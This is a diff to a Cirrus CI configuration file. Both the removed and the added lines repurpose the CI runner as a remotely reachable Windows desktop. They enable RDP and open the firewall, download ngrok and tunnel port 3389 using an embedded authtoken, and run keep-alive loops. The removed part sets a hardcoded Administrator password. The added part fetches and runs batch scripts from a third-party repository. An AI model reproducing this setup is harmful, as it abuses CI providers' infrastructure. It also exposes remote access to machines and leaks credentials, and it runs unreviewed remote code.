--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -9,17 +9,18 @@ env:
 
 task:
   script:
-    cmd wget -qO- ifconfig.co
-    cmd reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
-    Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText Pin1596@ -Force)
-    Get-LocalUser -Name "Administrator" | Enable-LocalUser
-    Set-ItemProperty ‘HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\‘ -Name “fDenyTSConnections” -Value 0
-    Set-ItemProperty ‘HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\‘ -Name “UserAuthentication” -Value 1
-    Enable-NetFirewallRule -DisplayGroup “Remote Desktop”
-    Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
-    tar xf ngrok.zip
-    Copy ngrok.exe C:\Windows\System32
-    cmd /c echo ./ngrok.exe authtoken 1sG77Yu0gc4U9QRyEW9BIpjAh1W_LQNFV9NyQWekE68tiHKK >a.ps1
-    cmd /c echo cmd /k start ngrok.exe tcp 3389 >>a.ps1
-    cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
-    .\a.ps1
+     Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
+        Invoke-WebRequest https://raw.githubusercontent.com/Gghbocil/RDP/main/start.bat -OutFile start.bat
+        Invoke-WebRequest https://i.imgur.com/vuXVHI4.png -OutFile wallpaper.png
+        Invoke-WebRequest https://raw.githubusercontent.com/Gghbocil/RDP/main/wallpaper.bat -OutFile wallpaper.bat
+        Invoke-WebRequest https://raw.githubusercontent.com/Gghbocil/RDP/main/loop.bat -OutFile loop.bat
+        Expand-Archive ngrok.zip
+        .\ngrok\ngrok.exe authtoken 1sG77Yu0gc4U9QRyEW9BIpjAh1W_LQNFV9NyQWekE68tiHKK
+        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
+        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
+        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
+        copy wallpaper.png D:\a\wallpaper.png
+        copy wallpaper.bat D:\a\wallpaper.bat
+        Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region ap 3389"'
+        cmd /c start.bat
+        cmd /c loop.bat
